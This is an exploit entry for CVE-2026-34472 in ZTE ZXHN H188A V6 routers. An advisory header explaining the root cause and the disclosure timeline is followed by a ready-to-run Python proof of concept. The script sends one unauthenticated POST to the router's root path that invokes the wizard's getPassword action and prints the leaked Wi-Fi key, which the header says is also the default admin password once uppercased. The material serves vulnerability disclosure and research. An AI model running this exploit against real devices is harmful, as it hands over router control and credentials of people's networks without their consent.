# Exploit Title: ZTE ZXHN H188A V6 - Authentication Bypass
# Date: 2026-05-20
# Exploit Author: Mina Nageh Salalma (Monx Research)
# Vendor Homepage: https://www.zte.com.cn
# Software Link: https://github.com/minanagehsalalma/cve-2026-34472-auth-bypass-zte-h188a-router
# Version: ZXHN H188A V6.0.10P2_TE, V6.0.10P3N3_TE
# Tested on: ZTE ZXHN H188A V6.0.10P2_TE
# CVE: CVE-2026-34472
# Description:
# Unauthenticated requests to the root path of ZTE ZXHN H188A V6 firmware
# can reach pre-login wizard handlers and disclose WLAN PSKs, SSIDs, and
# PPPoE usernames. The leaked Wi-Fi password is also the default administrator
# password after uppercasing, resulting in full authentication bypass.
#
# Root cause: router_logic_impl.lua accepts _type and _tag directly for
# empty-path requests. urlpath_2type_modifier.lua only applies QuickSetupEnable
# when _type is missing. Wizard handlers then expose credential-bearing read
# actions (getPassword, wlan_get, ppp_get) for unauthenticated users.
#
# Approximately 500 publicly exposed H188A interfaces were reachable at
# time of original report (May 2024). ZTE PSIRT stopped responding; CVE
# assigned by MITRE on 2026-03-27 after escalation.
#
# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34472
# PoC - Trigger wizard credential endpoint (Python 3 / requests). Sends a single
# unauthenticated POST to "/" and prints the raw response; run only against
# devices you are authorized to test.
import requests
import sys
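def exploit(target, *, timeout=10):
    """Send the unauthenticated wizard ``getPassword`` request to ``target``.

    The POST goes to the router's root path ("/") with ``_type`` and
    ``_tag`` supplied explicitly in the query string. Per the advisory
    header above, an explicit ``_type`` skips the ``QuickSetupEnable`` gate,
    so the pre-login wizard handler answers the ``getPassword`` read action
    for ``DEV.WIFI.AP1.PSK1`` without any session. On affected firmware the
    response carries the WLAN PSK, which (uppercased) is also the default
    administrator password. Use only against devices you are authorized to
    test.

    Args:
        target: host or ``host:port`` of the router's web interface. It is
            interpolated into a plain-HTTP URL unmodified, so pass a bare
            host, not a full URL.
        timeout: seconds to wait for connect/read before giving up.

    Returns:
        The ``requests.Response`` for any HTTP answer (non-200 codes are
        still printed, since the exact status on patched firmware is not
        known here), or ``None`` when the request itself failed
        (connection refused, timeout, DNS error, ...).
    """
    url = f"http://{target}/"
    # _type/_tag route the empty-path request straight to the wizard login
    # handler instead of the QuickSetupEnable-gated path.
    params = {"_type": "loginData", "_tag": "login_entry"}
    # requests would set this Content-Type for a dict body anyway; kept
    # explicit so the wire format of the PoC is obvious.
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    # Credential-bearing read action exposed by the wizard handler.
    data = {
        "IF_ACTION": "getPassword",
        "_InstID_PASS": "DEV.WIFI.AP1.PSK1",
        "PASSTYPE": "PSK",
    }
    try:
        # The URL is plain http, so TLS verification never applies here;
        # the original verify=False was dropped rather than leaving a
        # disabled-verification habit in the script.
        resp = requests.post(
            url, params=params, headers=headers, data=data, timeout=timeout
        )
    except requests.RequestException as exc:
        # Only network/HTTP-layer failures are expected; anything else
        # (e.g. a bug in this script) should surface as a traceback
        # instead of being reported as a target error.
        print(f"[-] {target}: {exc}")
        return None
    print(f"[+] {target} HTTP {resp.status_code}")
    # The body may be a full wizard page; 2000 chars is enough to see the
    # PSK field without flooding the terminal.
    print(resp.text[:2000])
    return resp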
if __name__ == "__main__":
    # One positional argument (the target host) is required; any extra
    # arguments are ignored.
    cli_args = sys.argv[1:]
    if not cli_args:
        print("Usage: poc.py <target_ip>")
        sys.exit(1)
    exploit(cli_args[0])